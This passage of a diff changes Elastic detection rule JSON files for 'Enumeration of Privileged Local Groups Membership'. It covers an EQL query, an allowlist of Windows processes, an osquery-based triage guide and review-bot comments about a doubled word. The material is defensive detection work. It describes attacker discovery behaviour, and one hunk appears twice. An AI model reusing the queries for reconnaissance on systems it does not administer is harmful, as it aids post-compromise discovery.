(Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate 
`event.ingested` to @timestamp for this rule to work.",
 "query": "iam where host.os.type == \"windows\" and event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"*admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n",
 "related_integrations": [
 {
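Review bot: The new-side `note` string still carries a duplicated word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; the same sentence recurs in the `setup` string of the `@@ -59,7 +59,7 @@` hunk below and in the `note` of the `_106` file. Since this commit only re-serializes `\u003e`/`\u003c` escapes as literal characters, it is a natural place to also drop the extra word: `Steps to implement the logging policy with Advanced Audit Configuration:`. These rule JSON files appear to be generated from the rule source, so the correction presumably belongs upstream rather than in a hand edit here.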
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4",
- "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_106.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_106.json
index 7c66a883eb3..e11d73176f2 100644
--- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_106.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Enumeration of Privileged Local Groups Membership",
- "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. 
Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, 
start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "iam where host.os.type == \"windows\" and event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\net1.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Netplwiz.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\CloudExperienceHostBroker.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\SrTasks.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\diskshadow.exe\",\n \"?:\\\\Windows\\\\System32\\\\dfsrs.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\WindowsAzure\\\\*\\\\WaAppAgent.exe\",\n \"?:\\\\Windows\\\\System32\\\\vssadmin.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\SettingSyncHost.exe\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemSettingsAdminFlows.exe\",\n \"?:\\\\Windows\\\\Temp\\\\rubrik_vmware???\\\\snaptool.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\x3jobt3?.exe\",\n \"?:\\\\Windows\\\\System32\\\\mstsc.exe\",\n \"?:\\\\Windows\\\\System32\\\\esentutl.exe\",\n \"?:\\\\Windows\\\\System32\\\\RecoveryDrive.exe\",\n \"?:\\\\Windows\\\\System32\\\\SystemPropertiesComputerName.exe\") and\n\n /* privileged local groups */\n (group.name:(\"*admin*\",\"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\",\"S-1-5-32-555\"))\n", "related_integrations": [ { 
@@ -59,7 +59,7 @@
 ],
 "risk_score": 47,
 "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4",
- "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
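Review bot: The rewritten `setup` value keeps the doubled word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; since this line is already being regenerated, `Steps to implement the logging policy with Advanced Audit Configuration:` is the one-token fix. The same phrase is repeated in the `setup` hunks of the 291a0de9…_107 and _108 files below and inside the `note` fields' setup section, so it presumably originates in the rule source these JSON exports are generated from and should be corrected there rather than patched per file.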
diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_107.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_107.json
index c06272b7a3f..6cd6eeaf23c 100644
--- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_107.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Privileged Local Groups Membership", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. 
Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, 
start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "iam where event.action == \"user-member-enumerated\" and\n\n /* excluding machine account */\n not winlog.event_data.SubjectUserName: (\"*$\", \"LOCAL SERVICE\", \"NETWORK SERVICE\") and\n\n /* noisy and usual legit processes excluded */\n not winlog.event_data.CallerProcessName:\n (\"-\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchIndexer.exe\",\n \"?:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\n \"?:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe\",\n \"?:\\\\Windows\\\\System32\\\\net1.exe\",\n 
